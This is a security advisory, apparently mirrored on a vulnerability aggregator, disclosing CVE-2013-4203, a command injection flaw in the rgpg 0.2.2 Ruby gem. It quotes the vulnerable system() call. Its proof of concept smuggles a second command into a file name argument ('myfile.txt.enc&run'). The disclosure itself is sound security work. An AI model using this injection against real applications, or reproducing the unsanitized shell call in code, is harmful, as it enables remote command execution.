Lucene search

K

Ruby Gem Rgpg 0.2.2 Command Injection Vulnerability

🗓️ 05 Aug 2013 00:00:00Reported by Larry CashdollarType 
zdt
 zdt
🔗 0day.today👁 23 Views

Rgpg 0.2.2 Ruby Gem Remote Command Injection Vulnerability in Gpg Helpe

Show more
Related
Code
ReporterTitlePublishedViews
Family
NVD
CVE-2013-4203
11 Oct 201322:55
nvd
OSV
rgpg Code Injection vulnerability
24 Oct 201718:33
osv
Prion
Code injection
11 Oct 201322:55
prion
Cvelist
CVE-2013-4203
11 Oct 201322:00
cvelist
securityvulns
Security vulnerabilities in different Ruby Gems
12 Aug 201300:00
securityvulns
securityvulns
Rgpg 0.2.2 Ruby Gem Remote Command Injection
12 Aug 201300:00
securityvulns
Packet Storm
Ruby Gem Rgpg 0.2.2 Command Injection
5 Aug 201300:00
packetstorm
Github Security Blog
rgpg Code Injection vulnerability
24 Oct 201718:33
github
CVE
CVE-2013-4203
11 Oct 201322:55
cve
RubySec
rgpg Gem for Ruby lib/rgpg/gpg_helper.rb Remote Command Execution
1 Aug 201320:00
rubygems
Rows per page
Title: Rgpg 0.2.2 Ruby Gem Remote Command Injection

Date: 7/31/2013

Advisory Author: Larry W. Cashdollar, @_larry0

CVE: CVE-2013-4203

Download: https://rubygems.org/gems/rgpg

Description:

"A simple Ruby wrapper around gpg command for file encryption.

rgpg is a simple API for interacting with the gpg tool. It is specifically designed to avoid altering global keyring state by creating temporary public and secret keyrings on the fly for encryption and decryption."

Vulnerability:

The following code snippet does not sanitize user supplied input before passing it to the System () function for execution. If this ApI is used in the context of a rails application remote commands can be injected into the shell.

in lib/rgpg/gpg_helper.rb:

 68       begin
 69         outputfile.close
 70         result = system("#{commandline} > #{output_file.path} 2>&1")
 71       ensure

PoC:


Our test code:
[email protected]:~$ cat /bin/run
#!/bin/sh

echo "Command Injection" > /tmp/rci.txt

irb(main):027:0* Rgpg::GpgHelper.encrypt_file 'mykey.pub', 'myfile.txt', 'myfile.txt.enc&run'
=> nil
irb(main):028:0> gpg: keyring `/tmp/gpg-key-ring20130804-2970-1et1k4c' created
gpg: processing message failed: eof

After above completes:

[email protected]:~$ ls -l /tmp/rci.txt 
-rw-rw-r-- 1 larry larry 18 Aug  4 11:12 /tmp/rci.txt
[email protected]:~$ cat /tmp/rci.txt 
Command Injection
[email protected]:~$ 


Author: Notified 8/1/2013.

Fixed: in 0.2.3. 8/1/2013.

Greets to [email protected]

#  0day.today [2018-02-19]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
05 Aug 2013 00:00Current
0.5Low risk
Vulners AI Score0.5
EPSS0.007
23
.json
Report